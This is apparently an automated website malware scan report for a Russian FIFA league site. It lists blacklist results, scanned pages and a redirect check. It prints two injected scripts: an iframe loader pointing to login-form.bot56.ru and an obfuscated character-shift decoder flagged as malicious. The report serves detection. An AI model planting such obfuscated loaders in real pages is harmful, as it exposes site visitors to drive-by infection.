Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fifaligue.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://fifaligue.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://fifaligue.ru/ | 200 OK Content-Length: 86136 Content-Type: text/html | clean |
http://autocontext.begun.ru/autocontext2.js | 200 OK Content-Length: 249 Content-Type: application/x-javascript | clean |
http://fifaligue.ru/js/design.js | 200 OK Content-Length: 3814 Content-Type: application/javascript | clean |
http://s105.ucoz.net/src/jquery-1.3.2.js | 200 OK Content-Length: 57533 Content-Type: text/javascript | clean |
http://s105.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://login-form.bot56.ru/jogin_form_javascript.js | 200 OK Content-Length: 200 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. var l = document; var wishyhd = l.getElementsByTagName('he' + 'ad')[0]; var emptiestag = l.createElement('ifr' + 'ame'); emptiestag.src = 'http://login-form.bot56.ru'; wishyhd.appendChild(emptiestag); | ||
http://fifaligue.chatovod.ru/widget/mini.js?width=170&popup=1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 07 Sep 2014 18:42:25 GMT Location: http://fifaligue.chatovod.ru/mini.js?width=170&popup=1 Server: nginx Content-Length: 178 Content-Type: text/html P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" | clean |
http://fifaligue.chatovod.ru/mini.js?width=170&popup=1 | 200 OK Content-Length: 2306 Content-Type: text/javascript | clean |
http://counter.rambler.ru/top100.jcn?2405938 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://fifaligue.ru/forum | 200 OK Content-Length: 126551 Content-Type: text/html | clean |
http://fifaligue.ru/index/rejting_igrokov/0-16/ | 200 OK Content-Length: 42552 Content-Type: text/html | clean |
http://fifaligue.ru/index/o_sajte/0-4 | 200 OK Content-Length: 44811 Content-Type: text/html | clean |
http://fifaligue.ru/gb | 200 OK Content-Length: 59722 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _y8M=''; function _dS(s){ var i;var r=""; var l=s.length-1; var k=s.substr(l,1); for (i=0;i<l;i++){ c=s.charCodeAt(i)-k; if(c<32){ c=127-(32-c);} r+=String.fromCharCode(c); } return r;} _y8M=_dS('Cpuw|{\'{!wlD)opkklu)\'uhtlD)zvz)\'}hs|lD);797?@?7<?)\'6E7'); Antivirus reports:
| ||
http://fifaligue.ru/index/nash_baner/0-13 | 200 OK Content-Length: 39774 Content-Type: text/html | clean |
http://fifaligue.ru/forum/27 | 200 OK Content-Length: 79867 Content-Type: text/html | clean |
http://fifaligue.ru/forum/27-40-1 | 200 OK Content-Length: 85922 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fifaligue.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Sun, 07 Sep 2014 18:42:25 GMT
Pragma: no-cache
Server: nginx
Content-Length: 86136
Content-Type: text/html;charset=utf-8
Expires: Wed, 10 Sep 2014 00:00:00 GMT
Last-Modified: Sun, 07 Sep 2014 00:00:00 GMT
X-Powered-By: PHP/5.3.29
...86136 bytes of data.
GET / HTTP/1.1
Host: fifaligue.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Sun, 07 Sep 2014 18:42:25 GMT
Pragma: no-cache
Server: nginx
Content-Length: 86136
Content-Type: text/html;charset=utf-8
Expires: Wed, 10 Sep 2014 00:00:00 GMT
Last-Modified: Sun, 07 Sep 2014 00:00:00 GMT
X-Powered-By: PHP/5.3.29
...86136 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: fifaligue.ru
Referer: http://www.google.com/search?q=fifaligue.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fifaligue.ru
Referer: http://www.google.com/search?q=fifaligue.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.